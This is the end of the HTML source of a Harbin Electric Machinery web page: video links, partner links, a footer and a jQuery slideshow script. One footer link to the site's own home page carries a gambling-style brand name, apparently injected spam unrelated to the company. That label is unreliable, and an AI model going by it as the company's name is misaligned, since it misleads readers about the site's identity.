                <!-- 视频封面图 -->
                <div style="float: left;">
                    <a href="/spzb_content/5806.html">
                        <img width="250" height="147"
                             src="https://www.hec-china.com/profile/6862998dd87fa.jpg"
                             alt="视频封面">
                    </a>
                </div>
                <!-- 视频标题（长度超过70字符截取前42位） -->
                <div style="float: right;width: 50%;">
                    <a class="linkindexying"
                       href="/spzb_content/5806.html"
                       style="font-size: 16px;">
                        · <!-- 保留原有的点号前缀 -->
                        <!-- 标题长度判断：超过70字符截取，否则显示完整标题 -->
                        
                        <span>哈电电机数智建设宣传片《锻造大国重器 智领时代浪潮》</span>
                    </a>
                </div>
            </div>
            <div style="margin-top: 20px;float: right;width: 37%;">
                <!-- 视频封面图 -->
                <div style="float: left;">
                    <a href="/spzb_content/5778.html">
                        <img width="250" height="147"
                             src="https://www.hec-china.com/profile/6846d36f43670.png"
                             alt="视频封面">
                    </a>
                </div>
                <!-- 视频标题（长度超过70字符截取前42位） -->
                <div style="float: right;width: 50%;">
                    <a class="linkindexying"
                       href="/spzb_content/5778.html"
                       style="font-size: 16px;">
                        · <!-- 保留原有的点号前缀 -->
                        <!-- 标题长度判断：超过70字符截取，否则显示完整标题 -->
                        
                        <span>庆祝哈电电机创建74周年——歌曲《动力之光》</span>
                    </a>
                </div>
            </div>
        </div>
    </div>
</div>
<!--通用底部-->
<link href="/css/footer.css" rel="stylesheet" type="text/css">
<div class="clear"></div>
<div class="linkying0">
    <div class="linkying1">
        友情链接： &nbsp; &nbsp;
        <a href="http://www.sasac.gov.cn/" target="_blank">国务院国有资产监督管理委员会</a>
        &nbsp; &nbsp;
        <a href="http://www.harbin-electric.com/" target="_blank">哈尔滨电气集团有限公司</a>
        &nbsp; &nbsp; &nbsp;
        <a href="http://www.hbc.com.cn" target="_blank">哈尔滨锅炉厂有限责任公司</a>
        &nbsp; &nbsp; &nbsp;
        <a href="http://www.htc.com.cn/" target="_blank">哈尔滨汽轮机厂有限责任公司</a>
        &nbsp; &nbsp; &nbsp;
        <a href="http://www.china-hei.com/index.htm" target="_blank">哈尔滨电气国际工程有限责任公司</a>
    </div>
</div>
<div class="footer">

    <div class="content">

        <div class="clear"></div>
        <div class="foot_logo"><img src="/images/foot_logo.png"></div>


        <div class="foot_nav">
            <ul>
                <li><a href="/" target="_blank">爱体育（中国）体育·官方网站</a></li>
                <li class="li1">|</li>
                <li><a href="/gsjj" target="_blank">关于哈电电机</a></li>
                <li class="li1">|</li>
                <li><a href="/zdcp1" target="_blank">产品与服务</a></li>
                <li class="li1">|</li>
                <li><a href="/news1" target="_blank">新闻中心</a></li>
                <li class="li1">|</li>
                <li><a href="/zbmk" target="_blank">党建云</a></li>
                <li class="li1">|</li>
                <li><a href="/lxwm" target="_blank">联系我们</a></li>
            </ul>
            <div class="clear"></div>
            <div class="foot_gs"><img src="/images/2weima.jpg">官方微信
                <!--<script type="text/javascript" src="http://113.9.6.134:8080/scripts/businessLicense.js?id=4028e4725c0d97d3015c3e62c3aa005b"></script>-->
            </div>

        </div>


        <div class="clear"></div>
        <div class="linkying">
            Copyright 2011-2023 By www.hec-china.com. All Rights Reserved
            <a href="https://beian.miit.gov.cn/#/Integrated/index" target="_blank"
               style="color: #5B5B5B">黑ICP备05007400号</a>
            <div class="gov"><img src="/images/gov.png" alt=""></div>
            <div class="hei">
                <a href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=23010302001606" target="_blank"
                   style="color: #5B5B5B">黑公网安备 23010302001606号</a>
            </div>
        </div>
    </div>
</div>
<script type="text/javascript" src="/js/index.js"></script>
<script type="text/javascript" src="/js/public.js"></script>

<!--通用底部-->
<!--ying 产品js-->
<script type="text/javascript">
    (function (A) {
        A.fn.th_video_focus = function (E) {

            var G = {
                actClass: "cur",
                navContainerClass: ".focus_pic_preview",
                focusContainerClass: ".focus_pic",
                animTime: 600,
                delayTime: 5000
            };

            if (E) {
                A.extend(G, E)
            }

            var C = G.actClass, D = G.navContainerClass, B = G.focusContainerClass, F = G.animTime, H = G.delayTime,
                I = null;

            return this.each(function () {

                var O = A(this), M = A(D + " li", O), P = A(B + " li", O), L = M.length, K = O.height();

                function N(R) {
                    var V = K * R * -1;
                    var U = A(B + " li", O), W = null, T = null;
                    for (var S = 0; S <= R; S++) {
                        W = U.eq(S);
                        T = W.find('script[type="text/templ"]');
                        if (T.length > 0) {
                            W.html(T.html())
                        }
                    }
                    A(B, O).stop().animate({top: V}, F, function () {
                        var Y = O.find("h3"), X = Y.height();
                        Y.height(0).html(A(B + " li").eq(R).find("img").attr("alt")).animate({height: X}, 600)
                    });
                    A(D + " li").eq(R).addClass(C).siblings().removeClass(C)
                }

                function Q() {
                    if (I) {
                        clearInterval(I)
                    }
                    I = setInterval(function () {
                        var R = A(D + " li." + C).index();
                        N((R + 1) % L)
                    }, H)
                }

                O.hover(function () {
                    if (I) {
                        clearInterval(I)
                    }
                }, function () {
                    Q()
                });

                var J = null;

                M.hover(function () {

                    var R = A(this).index();

                    if (I) {
                        clearInterval(I)
                    }
                    J = setTimeout(function () {
                        N(R)
                    }, 300)
                }, function () {
                    if (J) {
                        clearTimeout(J)
                    }
                    Q()
                }).click(function (T) {
                    var R = A(this).index(), S = P.eq(R).find("a");
                    if (document.uniqueID || window.opera) {
                        S[0].click();
                        T.stopPropagation();
                        T.preventDefault()
                    }
                });

                Q()

            })
        }

    })(jQuery);

    $(function () {


        $(".film_focus").th_video_focus({
            navContainerClass: ".film_focus_nav",
            focusContainerClass: ".film_focus_imgs",
            delayTime: 3000
        });

    });
</script>
<!--ying 产品js-->
<script type="text/javascript" src="/js/lib5.js"></script>
<script type="text/javascript" src="/js/index.js"></script>
<script type="text/javascript" src="/js/public.js"></script>
</body>
</html>